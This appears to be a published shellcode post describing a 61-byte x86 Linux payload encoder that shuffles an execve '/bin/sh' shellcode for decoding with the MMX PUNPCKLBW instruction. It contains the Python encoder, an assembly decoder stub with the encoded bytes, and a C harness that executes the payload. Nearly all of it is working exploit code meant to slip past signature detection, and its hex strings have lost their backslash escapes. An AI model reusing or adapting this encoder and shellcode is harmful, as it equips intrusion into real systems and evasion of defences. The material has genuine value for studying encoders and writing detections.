MMX-PUNPCKLBW Encoder Shellcode (61 bytes)

################################################################################
INTRO
################################################################################

# Exploit Title: MMX-PUNPCKLBW Encoder
# Description: Payload encoder using MMX PUNPCKLBW instruction
# Date: 13/04/2019
# Exploit Author: Petr Javorik
# Tested on: Linux ubuntu 3.13.0-32-generic x86
# Shellcode length: 61

################################################################################
ENCODER
################################################################################

#!/usr/bin/env python

# stack execve
SHELLCODE = bytearray(
    b'x31xc0x50x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x50x89xe2x53x89xe1xb0x0bxcdx80'
)

# Align to qword multiples
missing_bytes = 8 - (len(SHELLCODE) % 8)
padding = [0x90 for _ in range(missing_bytes)]
SHELLCODE.extend(padding)

# Shuffle payload
shuffled_payload = []
# First byte carries count of needed PUNPCKLBW loops
loop_count = len(SHELLCODE)//8
shuffled_payload.append(loop_count)
for block_num in range(0, loop_count):
    current_block = SHELLCODE[(8 * block_num) : (8 * block_num + 8)]
    shuffled_block = [current_block[i] for i in [0, 2, 4, 6, 1, 3, 5, 7]]
    shuffled_payload.extend(shuffled_block)

# Remove trailing NOPS
for byte in shuffled_payload[::-1]:
    if byte == 0x90:
        del shuffled_payload[-1]
    else:
        break

# Print shellcode
print('Payload length: {}'.format(len(shuffled_payload)))
print('x' + 'x'.join('{:02x}'.format(byte) for byte in shuffled_payload))
print('0x' + ',0x'.join('{:02x}'.format(byte) for byte in shuffled_payload))

################################################################################
DECODER
################################################################################

global _start

section .text
_start:

    jmp short call_decoder

decoder:

    pop edi
    xor ecx, ecx
    mov cl, [edi]
    inc edi
    mov esi, edi

decode:

    movq mm0, qword [edi]
    movq mm1, qword [edi +4]
    punpcklbw mm0, mm1
    movq qword [edi], mm0
    add edi, 0x8
    loop decode
    jmp esi

call_decoder:

    call decoder
    EncodedShellcode: db 0x04,0x31,0x50,0x2f,0x73,0xc0,0x68,0x2f,0x68,0x68,0x62,0x6e,0xe3,0x2f,0x69,0x89,0x50,0x89,0x53,0xe1,0x0b,0xe2,0x89,0xb0,0xcd,0x80

################################################################################
TESTING
################################################################################

#include
#include

unsigned char code[] = 
"xebx1cx5fx31xc9x8ax0fx47x89xfex0fx6fx07x0fx6fx4fx04x0fx60xc1x0fx7fx07x83xc7x08xe2xeexffxe6xe8xdfxffxffxffx04x31x50x2fx73xc0x68x2fx68x68x62x6exe3x2fx69x89x50x89x53xe1x0bxe2x89xb0xcdx80";

main()
{
    printf("Shellcode Length:  %dn", strlen(code));
    int (*CodeFun)() = (int(*)())code;
    CodeFun();
}

################################################################################


Kind Regards
------------------------------

Bc. Petr Javorik
www.mmquant.net
 maple@mmquant.net
            

Comments are closed.